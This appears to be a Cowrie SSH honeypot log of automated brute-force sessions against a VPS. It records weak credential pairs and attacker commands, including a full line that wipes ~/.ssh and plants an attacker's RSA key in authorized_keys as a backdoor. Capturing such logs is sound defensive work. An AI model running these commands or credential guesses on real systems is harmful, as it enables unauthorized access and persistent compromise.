{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:38:32.873923Z","src_ip":"212.227.235.229","session":"bcce3187b9dd"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:33.574456Z","src_ip":"45.125.211.194","session":"2babbf9e6800"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:38:33.638204Z","src_ip":"212.227.235.229","session":"bcce3187b9dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:38:34.225407Z","src_ip":"212.227.235.229","session":"bcce3187b9dd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:38:34.226078Z","src_ip":"212.227.235.229","session":"bcce3187b9dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:34.481302Z","src_ip":"212.227.235.229","session":"bcce3187b9dd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:34.482371Z","src_ip":"212.227.235.229","session":"bcce3187b9dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53324,"dst_ip":"1.2.3.4","dst_port":22,"session":"e126807d434f","protocol":"ssh","message":"New connection: 212.227.235.229:53324 (1.2.3.4:22) [session: e126807d434f]","sensor":"my-vps","timestamp":"2025-08-28T03:38:44.788870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:38:44.789651Z","src_ip":"212.227.235.229","session":"e126807d434f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:38:45.037833Z","src_ip":"212.227.235.229","session":"e126807d434f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:38:45.784790Z","src_ip":"212.227.235.229","session":"e126807d434f"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":36639,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ead307e249f","protocol":"ssh","message":"New connection: 45.125.211.194:36639 (1.2.3.4:22) [session: 4ead307e249f]","sensor":"my-vps","timestamp":"2025-08-28T03:38:46.189950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:38:46.197851Z","src_ip":"45.125.211.194","session":"4ead307e249f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:38:46.405979Z","src_ip":"45.125.211.194","session":"4ead307e249f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:47.034697Z","src_ip":"212.227.235.229","session":"e126807d434f"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:38:47.239611Z","src_ip":"45.125.211.194","session":"4ead307e249f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:48.451790Z","src_ip":"45.125.211.194","session":"4ead307e249f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46132,"dst_ip":"1.2.3.4","dst_port":22,"session":"b855d5ce5b8d","protocol":"ssh","message":"New connection: 212.227.235.229:46132 (1.2.3.4:22) [session: b855d5ce5b8d]","sensor":"my-vps","timestamp":"2025-08-28T03:38:55.425340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:38:55.511400Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45970,"dst_ip":"1.2.3.4","dst_port":22,"session":"78e488374121","protocol":"ssh","message":"New connection: 212.227.235.229:45970 (1.2.3.4:22) [session: 78e488374121]","sensor":"my-vps","timestamp":"2025-08-28T03:38:55.861202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:38:55.862075Z","src_ip":"212.227.235.229","session":"78e488374121"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:38:56.109262Z","src_ip":"212.227.235.229","session":"78e488374121"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:38:56.326687Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:38:56.853889Z","src_ip":"212.227.235.229","session":"78e488374121"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZXSW@3edc","message":"login attempt [root/!QAZXSW@3edc] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:38:57.774179Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:38:58.046835Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:38:58.047514Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:38:58.048800Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:58.103542Z","src_ip":"212.227.235.229","session":"78e488374121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:58.468847Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:38:58.606613Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T03:38:58.607278Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T03:38:58.761823Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:58.762804Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46133,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9884ceedc3e","protocol":"ssh","message":"New connection: 212.227.235.229:46133 (1.2.3.4:22) [session: c9884ceedc3e]","sensor":"my-vps","timestamp":"2025-08-28T03:38:58.856018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:38:58.889993Z","src_ip":"212.227.235.229","session":"c9884ceedc3e"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:38:58.978588Z","src_ip":"212.227.235.229","session":"c9884ceedc3e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T03:38:59.342513Z","src_ip":"212.227.235.229","session":"c9884ceedc3e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:00.437756Z","src_ip":"212.227.235.229","session":"c9884ceedc3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46134,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c4f602aa8fd","protocol":"ssh","message":"New connection: 212.227.235.229:46134 (1.2.3.4:22) [session: 0c4f602aa8fd]","sensor":"my-vps","timestamp":"2025-08-28T03:39:00.530296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:39:00.531244Z","src_ip":"212.227.235.229","session":"0c4f602aa8fd"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:39:00.634404Z","src_ip":"212.227.235.229","session":"0c4f602aa8fd"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":19104,"dst_ip":"1.2.3.4","dst_port":22,"session":"0506daa97bf2","protocol":"ssh","message":"New connection: 45.125.211.194:19104 (1.2.3.4:22) [session: 0506daa97bf2]","sensor":"my-vps","timestamp":"2025-08-28T03:39:01.031971Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:01.043070Z","src_ip":"45.125.211.194","session":"0506daa97bf2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:39:01.052570Z","src_ip":"212.227.235.229","session":"0c4f602aa8fd"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:01.164811Z","src_ip":"212.227.235.229","session":"0c4f602aa8fd"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:01.165814Z","src_ip":"212.227.235.229","session":"b855d5ce5b8d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:01.266279Z","src_ip":"45.125.211.194","session":"0506daa97bf2"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:39:02.140473Z","src_ip":"45.125.211.194","session":"0506daa97bf2"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":54552,"dst_ip":"1.2.3.4","dst_port":22,"session":"432bccbb87ea","protocol":"ssh","message":"New connection: 194.233.79.134:54552 (1.2.3.4:22) [session: 432bccbb87ea]","sensor":"my-vps","timestamp":"2025-08-28T03:39:03.340225Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:03.364012Z","src_ip":"45.125.211.194","session":"0506daa97bf2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:04.245068Z","src_ip":"194.233.79.134","session":"432bccbb87ea"}
